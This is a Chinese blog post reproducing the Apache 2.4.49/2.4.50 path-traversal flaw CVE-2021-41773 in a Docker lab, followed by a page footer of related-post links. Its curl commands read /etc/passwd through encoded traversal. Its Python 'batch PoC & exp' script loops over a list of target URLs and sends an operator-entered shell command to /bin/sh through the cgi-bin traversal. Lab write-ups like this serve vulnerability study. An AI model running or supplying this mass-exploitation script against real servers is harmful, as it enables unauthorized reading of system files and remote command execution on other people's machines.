CVE-2021-41773 Apache2.4.49&50 路径穿越漏洞复现

已于 2023-03-15 11:48:57 修改
阅读量733 收藏 1
点赞数
分类专栏: 安全 文章标签: web安全 python
于 2021-11-01 13:36:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chen5225/article/details/121040294
版权

CVE-2021-41773 Apache2.4.49&50 路径穿越漏洞复现

漏洞原理及影响版本
此次漏洞影响的版本有2.4.49 & 2.4.50版本的ahache
CVE-2021-41773 是在 Apache HTTP Server 2.4.49 中对路径规范化所做的更改中发现了一个缺陷。攻击者可以使用路径遍历攻击将 URL 映射到预期文档根目录之外的文件,如果文档根目录之外的文件不受“要求全部拒绝”的保护,则这些请求可能会成功,如果还为这些别名路径启用了 CGI 脚本,则可以允许远程代码执行。
此外,此缺陷可能会泄漏 CGI 脚本等解释文件的来源,已知此问题已被广泛利用。
此问题仅影响 Apache 2.4.49 和 Apache 2.4.50而不是早期版本。
参考链接:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773

1.环境搭建
此次的漏洞复现是在docker上进行
1.1docker的安装
docker的安装可从官网上看https://docs.docker.com/engine/install/centos/
或者看我博文:https://editor.csdn.net/md/?articleId=116257398

1.2从平台上拉取apache 2.4.49版本
拉取apache镜像
docker pull httpd:2.4.49
查看镜像版本是否正确
docker images
启动镜像
docker run -d -P e91425f38618
docker ps
在这里插入图片描述

进入容器
docker exec -it 4af5d1983b99 /bin/bash
在这里插入图片描述

修改镜像里面conf/httpd.conf的配置文件
如果出现以下这种情况,则输入以下两行代码即可安装vim
apt-get update
apt-get -y install vim
在这里插入图片描述

编辑conf/httpd.conf下的这两行,注释掉重新加进去
在这里插入图片描述

2.漏洞复现
查看映射端口
在这里插入图片描述

浏览器访问
在这里插入图片描述

用另一台机器访问
curl http://192.168.160.129:49154
curl http://192.168.160.129:49154/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
在这里插入图片描述
也可以用抓包改包软件来重构exp获取
在这里插入图片描述
批量poc&&exp脚本:

import requests
from requests import Request,Session

#http://192.168.81.136:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
hearder={
    "Accept":"*/*",
    "Accept-Language": "en",
    "Connection": "close",
    "Content-Type": "application/x-www-form-urlencoded",
    "User-Agent":"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:0.9.4) Gecko/20011128 Netscape6/6.2.1",
}
# proxy={
#     "http":"http://127.0.0.1:8080"
# }

def ahs(cmd):
    u = open('url.txt','r',encoding='utf-8')
    for url in u:
        try:
            icon = "/icons/"
            p = requests.get(url=url, headers=hearder,timeout=1)
            if p.status_code == 200:
                s = Session()
                url_poc = url+"/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
                req1 = Request('GET',url=url_poc,headers=hearder)
                pre = req1.prepare()
                pre.url = url_poc
                response1 = s.send(pre,timeout=1)#,proxies=proxy)
                if response1.status_code == 200:
                    # print(response1.text)
                    try:
                        url_exp = url+"/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"
                        command = "echo;"+cmd
                        req = Request('POST', url=url_exp, data=command, headers=hearder)
                        prepare = req.prepare()  # 转换成元类
                        prepare.url = url_exp
                        response = s.send(prepare, timeout=1)  # ,proxies=proxy)
                        out = response.text
                        # out=out.replace('\n', '')
                        print("输出结果为:"+out)
                    except Exception as e:
                        pass
                else:
                    print(response1.status_code)
            else:
                print(p.status_code)
        except Exception as e:
            pass
            print("无poc"+'\n')

if __name__ == '__main__':
    print("本代码为‘Apache HTTP Server 2.4.49中的路径遍历和文件泄漏漏洞(CVE-2021-41773)’的poc及exp批量化代码")
    cmd=input("请输入注入命令:")
    ahs(cmd)
xx的一只CC
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache HTTP Server 路径穿越漏洞复现(CVE-2021-41773 )
qq_59975439的博客
06-10 5878
Apache HTTP Server 路径穿越漏洞复现(CVE-2021-41773 )
第六届“强网杯”青少年专项赛 writewp by 楠辞姐姐后援团
JEWSWS的博客
09-11 2444
这次比赛难度很大,Crypto部分也全都是猜谜语类型的题目,没啥游戏体验,不过好在排名在前30.本篇WP为团队WP,团队成员为:树木,AcexZe,Lenyi战队名称:楠辞姐姐后援团战队排名:24。
apache-CVE-2021-41773[42013]-漏洞复现
csd_ct的专栏
02-05 3123
apache-CVE-2021-41773[42013] 验证及复现 CVE-2021-41773 影响范围为2.4.49 CVE-2021-42013 影响范围为2.4.49/50 漏洞验证 41773和42013在10月份时,被暴出目录穿越和远程命令执行,虽然只影响了apache的49/50版本,但是RCE漏洞,POC已公开,还是有较强的杀伤力。为了快速验证一下该漏洞,使用vulfocus提供的在线的靶场,开启应用,如图 访问应用首页,可得到apche服务器版本信息,如图, 验证目录遍历 利用网上爆
CVE-2021-41773(42013) Apache HTTP Server路径穿越漏洞复现
weixin_45260839的博客
06-03 5546
CVE-2021-41773(42013) Apache HTTP Server路径穿越漏洞复现
CVE-2021-41773 - (apache 文件读取&命令执行)漏洞复现
三天不打上房揭瓦的博客
10-08 2672
目录漏洞描述影响版本漏洞复现漏洞修复 漏洞描述 CVE-2021-41773 漏洞是在 9 月 15 日发布的 2.4.49 版中对路径规范化所做的更改引入到 Apache HTTP Server 中的。此漏洞仅影响具有“require all denied”访问权限控制配置被禁用的Apache HTTP Server 2.4.49 版本。成功的利用将使远程攻击者能够访问易受攻击的 Web 服务器上文档根目录之外的任意文件。根据该公告,该漏洞还可能泄露“CGI 脚本等解释文件的来源”,其中可能包含攻击者可以
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行.md
04-23
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行
CVE-2021-41773/42013 apache路径穿越漏洞
最新发布
mirocky的博客
10-26 649
如果路径中存在%2e./形式,就会检测到,但是出现.%2e/这种形式时,就不会检测到,原因是在遍历到第一个.字符时,此时检测到后面的两个字符是%2而不是./,就不会把它当作路径穿越符处理,因此可以使用.%2e/或者%2e%2e绕过对路径穿越符的检测。当检测到路径中存在%字符时,如果紧跟的2个字符是十六进制字符,就会进行url解码,将其转换成标准字符,如%2e->.,转换完成后会判断是否存在…3、开启42013的靶场,将%2e修改成%%32%65(2的ascii是32,e的ascii是65)
Apache HTTP Server2.4.50中的路径遍历和命令执行漏洞(CVE-2021-41773 & CVE-2021-42013)
weixin_63231007的博客
10-15 1008
漏洞是由于在 Apache HTTP Server 2.4.50版本中对CVE-2021-41773修复不够完善,攻击者可利用该漏洞绕过修复补丁,并利用目录穿越攻击访问服务器中一些文件,进而造成敏感信息泄露。若httpd中开启CGI功能,攻击者可以构造恶意请求,造成远程代码执行。
Apache HTTP Server 2.4.49 路径穿越漏洞CVE-2021-41773
weixin_47311099的博客
12-07 1945
Apache HTTP Server 2.4.49 路径穿越漏洞复现CVE-2021-41773) Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。在其2.4.49版本中,引入了一个路径穿越漏洞,满足下面两个条件的Apache服务器将会受到影响: 版本等于2.4.49 穿越的目录允许被访问,比如配置了<Directory />Require all granted</Directory>。(默认情况下是不允许的) 攻击者利用这个漏洞,可以
安全漏洞CVE-2021-41773CVE-2021-42013漏洞分析
HBohan的博客
10-16 2048
CVE-2021-41773 漏洞成因 Apache HTTP Server 2.4.49版本使用的ap_normalize_path函数在对路径参数进行规范化时会先进行url解码,然后判断是否存在…/的路径穿越符,如下所示: while (path[l] != '\0') { if ((flags & AP_NORMALIZE_DECODE_UNRESERVED) && path[l] == '%' && apr_isxdigit(p
目录穿越漏洞(CVE-2021-41773)复现
qq_43757105的博客
10-12 2149
目录 漏洞描述 漏洞复现具体步骤: 用burp复现: Get: Post: 漏洞描述 目录穿越比目录浏览、目录遍历更具破坏性,目录穿越不仅可以读取服务器中任何目录及任何文件的内容,还可以执行系统命令。 漏洞等级:高危 影响版本: Apache httpd 2.4.49-2.4.51 准备阶段: 环境:win7虚拟机(装有BP) kali(装有最新的docker vulhub) 漏洞复现具体步骤: 1.进入Vulhub目录中启动存在漏洞的Apache 服务器 /home/..
HackTheBox::Arctic
aya3t的博客
10-10 483
HackTheBox::Arctic
CVE-2021-41773|CVE-2021-42013——Apache HTTP Server路径遍历|远程代码执行
LiBai'S BLOG
11-13 8647
https://66.175.213.123/etc/passwd 请求包 GET https://66.175.213.123//icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 Host: 66.175.213.123 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,applica
红日安全内网渗透笔记
VB551的博客
04-10 4503
靶场下载地址:漏洞详情 环境配置参考:【红日安全-VulnStack】ATT&CK实战系列——红队实战(二) - yokan - 博客园 此实战仅有3台机器 DMZ区的WEB机 、核心区的AD机、办公区的PC 第一步:信息收集 已知WEB机的IP地址,用syn包进行扫描。 nmap -sS -v 192.168.111.80 获得端口开放 ...
CVE-2021-21978-带回显的漏洞利用方式
u011466862的专栏
03-05 730
CVE-2021-21978漏洞利用 带回显版本的漏洞利用脚本,更简单的方式 0. 漏洞信息 VMware View Planner Web管理界面存在一个上传日志功能文件的入口,没有进行认证且写入的日志文件路径用户可控,通过覆盖上传日志功能文件log_upload_wsgi.py,即可实现RCE 1. 依赖 pip install requests 2. 检测 python3 CVE-2021-21978.py https://192.168.80.3/ [外链图片转存失败,源站可能有防盗链机制,
cve-2021-41773漏洞复现
06-28
cve-2021-41773漏洞是Apache HTTP Server中的一个安全漏洞,攻击者可以利用该漏洞在未经授权的情况下访问服务器上的文件。 要复现漏洞,可以按照以下步骤进行: 1. 安装Apache HTTP Server,并确保其版本为2.4....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值